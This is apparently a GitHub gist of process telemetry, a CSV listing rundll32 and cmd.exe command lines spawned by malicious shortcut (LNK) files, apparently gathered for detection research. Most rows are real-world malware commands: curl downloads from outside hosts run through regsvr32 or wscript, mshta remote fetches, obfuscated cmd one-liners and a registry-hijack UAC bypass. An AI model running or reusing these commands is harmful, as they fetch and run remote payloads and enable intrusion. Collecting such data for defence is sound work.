Skip to content

Instantly share code, notes, and snippets.

@Samirbous

Samirbous/mal_lnk

Created September 6, 2022 15:31
Show Gist options
  • Star 7 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save Samirbous/c67d9c786756585a550cd4b3539db890 to your computer and use it in GitHub Desktop.
Save Samirbous/c67d9c786756585a550cd4b3539db890 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
mal_lnk
"Top 1000 values of process.executable","Top 1000 values of process.command_line","Top 1000 values of process.working_directory","Count of records"
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Program Files (x86)""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Windows""","C:\Users\user\Desktop\",8
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""ProgramData""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Recovery""","C:\Users\user\Desktop\",7
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Documents and Settings""","C:\Users\user\Desktop\",11
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Program Files""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""PerfLogs""","C:\Users\user\Desktop\",9
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Temp""","C:\Users\user\Desktop\",4
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""$SysReset""","C:\Users\user\Desktop\",2
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Sysmon""","C:\Users\user\Desktop\",4
"C:\Windows\System32\rundll32.exe","""C:\WINDOWS\system32\rundll32.exe"" url.dll,FileProtocolHandler DrivesGuideInfo\autorun.exe","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\WINDOWS\system32\rundll32.exe"" ~$WWVJPVXYJ.FAT,crys desktop.ini.ini rsfrsfrs refrefrn "" ""","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\WINDOWS\system32\rundll32.exe""  \---__-__-----_-_--_--_---_-__-_-_-_--.---__-__-----_-_--_--_---_-__-_-_-_--,PxTTTKyyUJptPxZq","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\WINDOWS\system32\rundll32.exe""  \\\\\\\\\\\~@%@%@@%~%~~@%~~.1,5RsE4Qm8yKgCxTum","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\WINDOWS\system32\rundll32.exe""  \_-_--___-_____---____--_--_-_-----_-_-_----_--._-_--___-_____---____--_--_-_-----_-_-_----_--,sx4uz4uz4uzpfkpD","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\WINDOWS\system32\rundll32.exe""  \apkuqzpxdtlakpbiomivtseb.uxa,aceacegikmoqsuxf","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\WINDOWS\system32\rundll32.exe""  \hov.sar90i0h.yhov.m4l3.xh2m7.qx39.z37bfjnr.s9p6hyk,3j0gxdtaq7p6m3j0","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" local.dll,DllInstall","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" m3n4rat.dll,PjyJGGCvQs","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" mu7en.dll,RunObject","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" n3zarek.dll,RoOEiztJvW","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" r7kom.dll, #1","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" scanned.dll,DllUnregisterServer","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" sol3nia.dll,RunObject","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" toso3l.dll,LyirJCyvGh","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" upload.dll,installprogram","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe""  \&&&&&&&&&&&&&&^^^^^^^^^^&&^&&^^^.2,Y48Y5UmCbatB1Qeg","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\RUNDLL32.EXE"" desk.cpl,InstallScreenSaver C:\Users\george\AppData\Local\Gelios Software\3D Fish School 4\ss3dfish.scr","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\RUNDLL32.EXE"" desk.cpl,InstallScreenSaver C:\Users\george\AppData\Local\Gelios Software\3D Realistic Fireplace 3\ss3dfire.scr","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \\\\\\{9FFCE82E-D1EF-43DE-BB5F-F891BA982E11}.{22B1D90A-24A8-4B74-A8D3-E8BFA54E026A},Kel5BVcw2MTntDle","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe"" C:\PROGRA~3\679B258C2.cpp,work","C:\Windows\system32\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\config\SYSTEM~1\AppData\Roaming\AdobeARM\ADOBEA~1.DLL,Rundll32Main","C:\Windows\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,Control_RunDLL ""C:\Windows\system32\main.cpl"",Mouse","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe"" url,OpenURL ""https://yanstat.ru/gl/?cid=19339&oid=1925&v=3&utm_campaign=repacks1&trash=""","C:\Windows\system32\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \&&^&^&&^&^&&^&^&&^&^&^^&^&^&&^&^^&^^.{DAD80894-F38E-4294-A53A-FDE005FF4658},rPxV3b9dBjHtR3n1","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \-------_____----________--------__---_.-------_____----________--------__---_,XZHphjHJLtb9hZ7B","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \---__--_-------__-_---___----___-----_.---__--_-------__-_---___----___-----_,OzbCoCncR0ZBmbOQ","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \--_-_----__--_--__---_----_---__--__--___--__-_---__-_--_--.--_-_----__--_--__---_----_---__--__--___--__-_---__-_--_--,oiYO60qgGysiYOAk","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \_-_-_-_-_--_-_-_-_--_-_-__---_-_._-_-_-_-_--_-_-_-_--_-_-__---_-_,AWsEawIe0Mi4Qm8e","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \__-__--_-_--__--___-__-__--_-_---_---_---_--__--_-___-_.__-__--_-_--__--___-__-__--_-_---_---_---_--__--_-___-_,ys0uoiqkeKmeKmSu","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \___----___-----_--____-------_------____-----__--_.{3CD2426B-5A37-427B-B16D-363B0B3FFCDA},lyeLbR2FS3Gr4Es8","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \_____--__----__--___----_---____--_---__._____--__----__--___----_---____--_---__,10EjTSRQPdN7LKJZ","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\Windows\system32\rundll32.exe""  \___________________________________________________________--.___________________________________________________________--,R1bBlLvV5fFpPz1o","C:\Users\user\Desktop\",1
"C:\Windows\System32\rundll32.exe","""C:\windows\system32\rundll32.exe"" url.dll,FileProtocolHandler DrivesGuideInfo\autorun.exe","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'E5P' && MD ""%HOMEPATH%\qI\ZXOjp"" && ping kz.org && echo ""jg"" && curl.exe --output %HOMEPATH%\qI\ZXOjp\DSVa.BVLl.ae https://arboldeaventuras.com/uAY4Y/C.png && echo ""DQh"" && regsvr32 ""%HOMEPATH%\qI\ZXOjp\DSVa.BVLl.ae""","C:\Users\user\Desktop\",15
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /C .\WindowsServices\movemenoreg.vbs","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'v7HL' && echo ""CX"" && MD ""%HOMEPATH%\kbp7\ur"" && curl.exe --output %HOMEPATH%\kbp7\ur\CRS2qKz.an.s03 https://bottlenuts.com/6wErmG/D.png && ping VS.org && regsvr32 ""%HOMEPATH%\kbp7\ur\CRS2qKz.an.s03""","C:\Users\user\Desktop\",13
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'BYRE' && MD ""%HOMEPATH%\XL\zAkOR"" && curl.exe --output %HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw https://fratelliperu.com/aYMst/A.png && echo ""ak"" && regsvr32 ""%HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw"" && ping d.io","C:\Users\user\Desktop\",12
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start _ & _\DeviceManager.exe & exit","C:\Users\user\Desktop\",8
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'i0' && ping yrl.net && MD ""%HOMEPATH%\Wc\ItF5"" && curl.exe --output %HOMEPATH%\Wc\ItF5\t3JC.frZL.YXSA https://maagayatrilogistics.com/WUK4Q/q.png && regsvr32 -u ""%HOMEPATH%\Wc\ItF5\t3JC.frZL.YXSA"" && ping 0Ev.com","C:\Users\user\Desktop\",8
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'U3U' && echo ""ooq"" && ping NP2F.com && MD ""C:\Users\user\mX"" && echo ""b7G"" && echo ""ZZp"" && curl.exe --output C:\Users\user\mX\kO36.png https://licentokil.com/pSdA/W.dll && regsvr32 ""C:\Users\user\mX\kO36.png""","C:\Users\user\Desktop\",6
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start __ & __\DriveMgr.exe & exit","C:\Users\user\Desktop\",5
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'Qn' && MD ""%HOMEPATH%\vD\lZf"" && ping sePe.net && curl.exe --output %HOMEPATH%\vD\lZf\KZsE.sQvn.wg8h.js https://jickhargaura.com/N9/uq.js && ping b.io && cd ""%HOMEPATH%\vD\lZf"" && wscript KZsE.sQvn.wg8h.js && echo ""RH""","C:\Users\user\Desktop\",5
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'Wd' && MD ""C:\Users\user\AppData\Roaming\dd"" && curl.exe -o C:\Users\user\AppData\Roaming\dd\v8m_X.Y9Tm.fOdH https://altosieg.com/10Mh/D2.png && echo ""Ol"" && ping hE.com && regsvr32 ""C:\Users\user\AppData\Roaming\dd\v8m_X.Y9Tm.fOdH"" && echo ""cW""","C:\Users\user\Desktop\",5
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'zA1' && MD ""C:\Users\user\AppData\Roaming\Iu\MlSL"" && curl.exe --output C:\Users\user\AppData\Roaming\Iu\MlSL\FEqwhs8j.GE.v6E.js https://partoniroo.com/N9/u.js && ping O0.org && cd ""C:\Users\user\AppData\Roaming\Iu\MlSL"" && wscript FEqwhs8j.GE.v6E.js && ping H.io && ping u.org","C:\Users\user\AppData\Roaming\",5
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start http://internet-start.net/?utm_source=beatle^&utm_medium=icon^&utm_campaign=pin","C:\Users\user\Desktop\",4
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'vSHw' && MD ""C:\ProgramData\XLhkBo\fF"" && curl.exe --output C:\ProgramData\XLhkBo\fF\UP2IOb.IOzv.Zm https://neptuneimpex.com/BmM/J.png && echo ""FD"" && regsvr32 ""C:\ProgramData\XLhkBo\fF\UP2IOb.IOzv.Zm"" && echo ""JEn""","C:\Users\user\Desktop\",4
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start .\￿ & start .\￿\VolDriver.exe","C:\Users\user\Desktop\",3
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c calc.exe","C:\Users\user\Desktop\",3
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'SGz' && echo ""TYEq"" && MD ""%HOMEPATH%\bG"" && echo ""Nm"" && ping ExCt.com && echo ""rcF"" && curl.exe -o %HOMEPATH%\bG\J10M.VI.WYYK https://takeone.tech/8NMlHT/EWw.png && regsvr32 ""%HOMEPATH%\bG\J10M.VI.WYYK""","C:\Users\user\Desktop\",3
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'r_m' && MD ""C:\Users\user\AppData\Local\QM"" && echo ""cW"" && curl.exe -o C:\Users\user\AppData\Local\QM\zLy_m.Oi.Jv https://gesam.com.bo/qVx/1.png && regsvr32 ""C:\Users\user\AppData\Local\QM\zLy_m.Oi.Jv"" && ping OPO.com && ping rG02.com","C:\Users\user\Desktop\",3
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni ""https://share.1drvmicrosoft.com/2md4s4vcify6qAAHuH7lvi/gNOxBneoZaTFG8fGQYqg=""","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start ..\Skypee\tmpE0D.tmp.Google.exe explorer vzJDxzVJTUbGgaH(""JUNEJQ=="") & exit","C:\Users\user\Desktop\",3
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start /b mshta https://share.1drvmicrosoft.com/CQGnFg5S93DyELGbJM4MPL4iNqjDna57OrLjrcBINRs=","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\Tbj1PDU\&&s^eT MPUI=C:\Tbj1PDU\^Tbj1PDU&&S^Et LZFC=vNi9ar CCcl=""sc""+""^r"";DCcl=""i^p""+""t^:Ni9h"";ECcl=""T""+""t^P""+"":"";GNi9et^Ob^jNi9ec^t(CCcl+DCcl+ECcl+'&&s^ET W63=THYXTTHYXTeraa2s.sucatadevalor.coTHYXT?1THYXT');&&s^Et/^p R7PF=""!LZFC:Ni9=!!W63:THYXT=/!""<n^ul > !MPUI!.^jS|ca^ll c^a^ll !MPUI!.jS"" ","C:\wINdOws\sYSteM32\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\WswY4EW\&&s^eT NGHE=C:\WswY4EW\^WswY4EW&&S^Et MNCS=v5h9ar CSuH=""sc""+""^r"";DSuH=""i^p""+""t^:5h9h"";ESuH=""T""+""t^P""+"":"";G5h9et^Ob^j5h9ec^t(CSuH+DSuH+ESuH+'&&s^ET ZAB=MXEBJMXEBJr385gwyaeai.camilavianacaixa.picsMXEBJ?1MXEBJ');&&s^Et/^p 29QP=""!MNCS:5h9=!!ZAB:MXEBJ=/!""<n^ul > !NGHE!.^jS|ca^l^l call !NGHE!.jS"" ","C:\wINdOws\sYSteM32\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\sgP3TU1\&&s^eT ALDA=C:\sgP3TU1\^sgP3TU1&&S^Et OMXO=vyR3ar CxuR=""sc""+""^r"";DxuR=""i^p""+""t^:yR3h"";ExuR=""T""+""t^P""+"":"";GyR3et^Ob^jyR3ec^t(CxuR+DxuR+ExuR+'&&s^ET X1J=PDQYRPDQYRrceeu2.jaestaoalertando.za.comPDQYR?1PDQYR');&&s^Et/^p S9K7=""!OMXO:yR3=!!X1J:PDQYR=/!""<n^ul > !ALDA!.^jS|ca^ll s^t^a^rt !ALDA!.jS"" ","C:\wINdOws\sYSteM32\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""#\#####\######\###\###\####\####\####\test.chs||(forfiles /P C:\Users\user\AppData\Roaming\..\..\ /S /^M^ ""EL Non-Paper Pandemic Resilience final.rar"" /C ""cmd /c (c:\progra~1\winrar\winrar x -id -o+ @path||c:\progra~2\winrar\winrar x -id -o+ @path)&&#\#####\######\###\###\####\####\####\test.chs"")""","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""curl ht%ALLUSERSPROFILE:~12,1%p://124.220.178.26/%PUBLIC:~-1,1%md.t%CommonProgramFiles(x86):~18,-16%t >%CommonProgramW6432:~-19,1%C:\Users\user\AppData\Local\Temp%APPDATA:~-16,-15%\%TEMP:~-8,1%%APPDATA:~-4,-3%d.vbs && C:\Users\user\AppData\Local\Temp\\c%TEMP:~-2,-1%d.vbs""","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c curl -o C:\Users\user\AppData\Local\Temp\58119.jpg http://213.109.192.61/hisIfDo.dat&&C:\Windows\system32\regsvr32 C:\Users\user\AppData\Local\Temp\58119.jpg","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\user\AppData\Local\Temp\willNoBut.png http://216.238.109.24/haveWellWhat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\user\AppData\Local\Temp\willNoBut.png","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c start http://internet-start.net/?utm_source=beatle^&utm_medium=icon^&utm_campaign=desktop","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'An' && MD ""%HOMEPATH%\Gc7aE\xNGaR"" && ping djL.io && echo ""LppG"" && curl.exe --output %HOMEPATH%\Gc7aE\xNGaR\nI1X.Npo.irCe.js https://skikids.at/N9/uq.js && cd ""%HOMEPATH%\Gc7aE\xNGaR"" && wscript nI1X.Npo.irCe.js","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'FJ' && MD ""C:\Users\user\fm_j"" && curl.exe --output C:\Users\user\fm_j\ooTCNA.Hcw.Thw https://slgemseller.com/rmaS/Es.png && regsvr32 -e -n -i:""Update Installation"" ""C:\Users\user\fm_j\ooTCNA.Hcw.Thw"" && ping pXl.com","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'N3' && MD ""%HOMEPATH%\HB"" && echo ""HA"" && echo ""dI"" && ping NzUU.com && curl.exe -o %HOMEPATH%\HB\Xc58.Zz2.gfwb https://atenaperu.com/FbX5r/09.png && regsvr32 ""%HOMEPATH%\HB\Xc58.Zz2.gfwb""","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c ping google.com && md C:\Users\user\AppData\Local\qjyMrn && curl.exe -o C:\Users\user\AppData\Local\qjyMrn\qjyMrn.nls sakshiinfoway.info/vlaq7GFVbI/AQ.png && ping google.com && start /IM regsvr32.exe -e C:\Users\user\AppData\Local\qjyMrn\qjyMrn.nls","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni ""https://docs.cooporatestock.com/ipk1TeZnL3RQiNEvNW7VIZooButELfRz11MfwohCFNk=""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c powershell -e^p by^pa^ss %cd%\data\test1.ps1","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start C:\MicrosoftSecurity\MicrosoftSecurity.exe C:\MicrosoftSecurity\Microsoft.a3x & exit","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c start https://www.cfdi.com.mx/login/ & REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /d ""cmd.exe /c rundll32.exe \\sodkvsodkv.facturas.stuff-4-sale.us\files\Tammy.dll, DAMM & REG DELETE HKCU\Software\Classes\mscfile\shell\open\command /f"" /f & timeout /t 3 >nul & eventvwr.exe","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""start %cd%2018刑-491(李振)4-3.jpg & attrib -s -h %cd%GolQEWo.exe & xcopy /F /S /Q /H /R /Y %cd%GolQEWo.exe C:\Users\user\AppData\Local\Temp\VqLji\ & attrib +s +h %cd%GolQEWo.exe & start C:\Users\user\AppData\Local\Temp\VqLji\GolQEWo.exe & exit""","C:\Users\user\Desktop\",2
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\System32\cmd.exe"" /c start __ & __\DriveMgr.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.eXE"" /CcmD<VqBtt.IcU","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe""
/C C:\Windows\system32\cmd.exe<xphFk.uSb","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c cd C:\Users\Public\Downloads & curl -o r.png http://91.121.177.204:4343/rp.png & start r.png","C:\Users\Public\Downloads\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c ""C:\Windows\explorer.exe %cd%Zeltlager & start %cd%THjozjnHgrCpSbG.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c ""start %cd%RECYCLER\bfbd401b.exe &&C:\Windows\explorer.exe %cd%Love Rhapsody","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start ..\MozillaFirefox\GoogleChrome.exe /AutoIt3ExecuteScript ..\MozillaFirefox\GoogleChrome.a3x explorer ChrW(37) & ChrW(84-17) & ChrW(87-19) & ChrW(35+2) & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start ..\Skypee\AutoIt3.exe /AutoIt3ExecuteScript ..\Skypee\googleupdate.a3x explorer ""%CD%"" & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start 832fd6eb30fbc49e853b00f298a0c7ad.exe&start 6640500dcca1dd2a4bc1ae17a89e0c7a.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start 9e3f76d589f90927b51274b30af6fa6a.exe&explorer /root,""%CD%edit"" & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x explorer ChrW(41-4) & String(""C"") & ChrW(68) & ChrW(2+35) & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start Palma.2021.1080P-Dual-Lat-Cine-Calidad.Com.mp4&#115;&#116;&#97;&#114;&#116;&#32;&#65;&#76;&#85;&#77;&#78;&#73;&#46;&start RAD91D~1.VBS&#115;&#99;&#114 &"" &exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start Servieca.vbs&start Photo"" ""27"" ""12"" """" ""2012"" ""054.jpg & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start Servieca.vbs&start preview-ue-3-1-c1-les-14-besoins-fondamentaux-de-v-h-14-02-12-9.jpg & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start e1c3d1cdc3502eec6af684a05f8bcebc.exe&start 4u2wlg08us14fxn.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start e1c3d1cdc3502eec6af684a05f8bcebc.exe&start u2etn25us14.exe & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start rundll32  \eeaccaeeaeaaaceacceacaacceeaceaceacaeaceaeceecaceceaaacaece.eeaccaeeaeaaaceacceacaacceeaceaceacaeaceaeceecaceceaaacaece,SAQkoEYsIcgAUkEQ","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start streamerdata\streamer.exe /AutoIt3ExecuteScript ""streamerdata\stream.txt"" Z1B638SA9MlMs92 & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start streamerdata\streamer.exe /AutoIt3ExecuteScript ""streamerdata\stream.txt"" qEy2762kwjRRX6f & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" /c start wscript /e:VBScript.Encode Manuel.doc & start explorer 1 & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\WINDOWS\system32\cmd.exe"" F/c ""start %cd%\install.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/X/D/V/c tYPe IQ.Nxs|cMd","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/D/xtMN/ccMD<backUp.LnK:H","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/d /RtYpE xpHFk.UsB|cmD","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/vfEifB/d/RCmD<jm64.LnK:wcC","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/q/V/Rcmd<""USb DRive.LnK:cxr""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/Q/RTYPE cVBCU.ICo|Cmd","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/Q /D/c CmD<XPhfK.sav","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/Q/X/rTyPe piIVC.pD|CmD","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/y/Y/r Cmd<jlz.Fpo","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/V /RtyPe qwG.cFg|cMd","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/V/r !CoMSPEC!<W.LNk:wjh","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/Q/R Type hsPCN.tif|cMD","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/X/d/Q /R CMd<IEgL.LOG","C:\Users\user\Desktop\",1
